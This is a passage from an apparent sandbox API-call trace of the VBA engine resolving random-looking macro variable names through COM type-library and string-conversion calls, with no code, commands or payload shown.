pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6235e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="iwwCGCk") returned 8 [0069.085] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="iwwCGCk", lHashVal=0x10020a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6235e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="iwwCGCk") returned 8 [0069.085] ITypeComp:RemoteBind (in: This=0x665bd30, szName="iwwCGCk", lHashVal=0x10020a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.085] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="iwwCGCk") returned 0x10020a [0069.085] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="iwwCGCk" | out: _Dst="iwwCGCk") returned 0x0 [0069.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="iwwCGCk") returned 8 [0069.085] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.085] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="iwwCGCk", lHashVal=0x10020a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.085] IUnknown:Release (This=0x665ba50) returned 0xd [0069.085] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.085] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="iwwCGCk", lHashVal=0x10020a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.085] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.085] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.085] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="iwwCGCk", lHashVal=0x10020a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.085] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.085] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.085] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="iwwCGCk", lHashVal=0x10020a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.086] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6235e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="iwwCGCk") returned 8 [0069.086] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="iwwCGCk", lHashVal=0x10020a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.086] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.086] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a6235e | out: _Dst=0x67c2d40) returned 0x0 [0069.086] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_iwwCGCk") returned 0x10f64c [0069.086] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_iwwCGCk" | out: _Dst="_B_var_iwwCGCk") returned 0x0 [0069.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_iwwCGCk") returned 15 [0069.086] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.086] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_iwwCGCk", lHashVal=0x10f64c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.086] IUnknown:Release (This=0x665ba50) returned 0xd [0069.086] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.086] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_iwwCGCk", lHashVal=0x10f64c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.086] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.086] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.086] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_iwwCGCk", lHashVal=0x10f64c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.086] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.086] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.086] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_iwwCGCk", lHashVal=0x10f64c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.086] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.086] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.086] IUnknown:Release (This=0x665ba50) returned 0xd [0069.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1100e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_iwwCGCk") returned 15 [0069.086] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_iwwCGCk", lHashVal=0x10f64c, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x47004300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x69005f00720061, ppTypeComp=0x47004300000000, pDummy=0x0) returned 0x0 [0069.087] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a6235e | out: _Dst=0x144ec0) returned 0x0 [0069.087] ITypeComp:RemoteBind (in: This=0x665ba60, szName="oAkkwZ", lHashVal=0x10856c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62386, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="oAkkwZ") returned 7 [0069.087] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="oAkkwZ", lHashVal=0x10856c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62386, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="oAkkwZ") returned 7 [0069.087] ITypeComp:RemoteBind (in: This=0x665bd30, szName="oAkkwZ", lHashVal=0x10856c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.087] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="oAkkwZ") returned 0x10856c [0069.087] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="oAkkwZ" | out: _Dst="oAkkwZ") returned 0x0 [0069.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="oAkkwZ") returned 7 [0069.087] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.087] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="oAkkwZ", lHashVal=0x10856c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.087] IUnknown:Release (This=0x665ba50) returned 0xd [0069.087] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.087] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="oAkkwZ", lHashVal=0x10856c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.087] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.087] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.087] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="oAkkwZ", lHashVal=0x10856c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.087] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.087] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.087] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="oAkkwZ", lHashVal=0x10856c, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.087] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62386, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="oAkkwZ") returned 7 [0069.088] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="oAkkwZ", lHashVal=0x10856c, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.088] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.088] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a62386 | out: _Dst=0x67c2d40) returned 0x0 [0069.088] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_oAkkwZ") returned 0x100015 [0069.088] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_oAkkwZ" | out: _Dst="_B_var_oAkkwZ") returned 0x0 [0069.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_oAkkwZ") returned 14 [0069.088] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.088] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_oAkkwZ", lHashVal=0x100015, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.088] IUnknown:Release (This=0x665ba50) returned 0xd [0069.088] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.088] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_oAkkwZ", lHashVal=0x100015, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.088] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.088] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.088] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_oAkkwZ", lHashVal=0x100015, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.088] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.088] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.088] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_oAkkwZ", lHashVal=0x100015, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.088] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.088] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.088] IUnknown:Release (This=0x665ba50) returned 0xd [0069.088] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1103e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_oAkkwZ") returned 14 [0069.088] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_oAkkwZ", lHashVal=0x100015, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6f005f00720061, ppTypeComp=0x77006b00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6f005f00720061, ppTypeComp=0x77006b00000000, pDummy=0x0) returned 0x0 [0069.088] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a62386 | out: _Dst=0x144ec0) returned 0x0 [0069.089] ITypeComp:RemoteBind (in: This=0x665ba60, szName="hAwAAA", lHashVal=0x102c5d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a623ae, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="hAwAAA") returned 7 [0069.089] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="hAwAAA", lHashVal=0x102c5d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a623ae, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="hAwAAA") returned 7 [0069.089] ITypeComp:RemoteBind (in: This=0x665bd30, szName="hAwAAA", lHashVal=0x102c5d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.089] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="hAwAAA") returned 0x102c5d [0069.089] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="hAwAAA" | out: _Dst="hAwAAA") returned 0x0 [0069.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="hAwAAA") returned 7 [0069.089] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.089] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="hAwAAA", lHashVal=0x102c5d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.089] IUnknown:Release (This=0x665ba50) returned 0xd [0069.089] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.089] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="hAwAAA", lHashVal=0x102c5d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.089] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.089] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.089] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="hAwAAA", lHashVal=0x102c5d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.089] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.089] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.089] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="hAwAAA", lHashVal=0x102c5d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.089] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a623ae, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="hAwAAA") returned 7 [0069.089] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="hAwAAA", lHashVal=0x102c5d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.090] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.090] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a623ae | out: _Dst=0x67c2d40) returned 0x0 [0069.090] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_hAwAAA") returned 0x10a706 [0069.090] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_hAwAAA" | out: _Dst="_B_var_hAwAAA") returned 0x0 [0069.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_hAwAAA") returned 14 [0069.090] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.090] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_hAwAAA", lHashVal=0x10a706, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.090] IUnknown:Release (This=0x665ba50) returned 0xd [0069.090] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.090] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_hAwAAA", lHashVal=0x10a706, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.090] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.090] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.090] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_hAwAAA", lHashVal=0x10a706, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.090] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.090] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.090] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_hAwAAA", lHashVal=0x10a706, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.090] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.090] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.090] IUnknown:Release (This=0x665ba50) returned 0xd [0069.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1106e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_hAwAAA") returned 14 [0069.090] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_hAwAAA", lHashVal=0x10a706, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x68005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x68005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.090] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a623ae | out: _Dst=0x144ec0) returned 0x0 [0069.091] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.091] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.091] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.091] IUnknown:Release (This=0x665ba50) returned 0xd [0069.091] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.091] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.091] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.091] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.091] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.091] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.091] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.091] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.091] IUnknown:Release (This=0x665ba50) returned 0xd [0069.091] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.091] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.091] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.091] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.091] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.091] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.091] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.091] IUnknown:Release (This=0x665ba50) returned 0xd [0069.092] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.092] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.092] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.092] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.092] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.092] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.092] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.092] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.092] IUnknown:Release (This=0x665ba50) returned 0xd [0069.092] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.092] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.092] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: 